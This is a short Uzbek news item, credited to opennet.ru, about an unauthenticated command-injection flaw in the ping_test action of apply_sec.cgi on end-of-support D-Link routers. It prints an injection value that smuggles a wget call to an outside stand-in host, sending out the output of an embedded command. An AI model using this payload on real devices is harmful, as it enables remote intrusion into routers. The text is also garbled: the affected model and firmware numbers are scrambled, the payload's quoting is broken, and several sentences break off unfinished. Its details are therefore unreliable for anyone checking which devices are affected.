D-Link simsiz routerlarida
Qizig'i shundaki, proshivka ishlab chiqaruvchilarining fikriga ko'ra, "ping_test" qo'ng'irog'i faqat autentifikatsiyadan so'ng amalga oshirilishi kerak, lekin aslida u veb-interfeysga kirishdan qat'i nazar, har qanday holatda chaqiriladi. Xususan, apply_sec.cgi skriptiga kirishda va “action=ping_test” parametridan o‘tishda skript autentifikatsiya sahifasiga yo‘naltiriladi, lekin ayni paytda ping_test bilan bog‘liq amalni bajaradi. Kodni bajarish uchun ping_testning o'zida yana bir zaiflikdan foydalanilgan, u sinov uchun yuborilgan IP manzilining to'g'riligini to'g'ri tekshirmasdan ping yordam dasturini chaqiradi. Masalan, wget yordam dasturiga qo'ng'iroq qilish va "echo 1234" buyrug'i natijalarini tashqi xostga o'tkazish uchun "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" parametrini ko'rsatish kifoya. test.test/?$( echo 1234)".
Zaiflikning mavjudligi quyidagi modellarda rasman tasdiqlangan:
- 655b3.02 yoki undan yuqori proshivkali DIR-05;
- 866b1.03 yoki undan yuqori proshivkali DIR-04L;
- 1565 yoki undan yuqori proshivkali DIR-1.01;
- DIR-652 (proshivkaning muammoli versiyalari haqida ma'lumot berilmagan)
Ushbu modellarni qo'llab-quvvatlash muddati allaqachon tugagan, shuning uchun D-Link
Keyinchalik zaiflik ham borligi aniqlandi
Manba: opennet.ru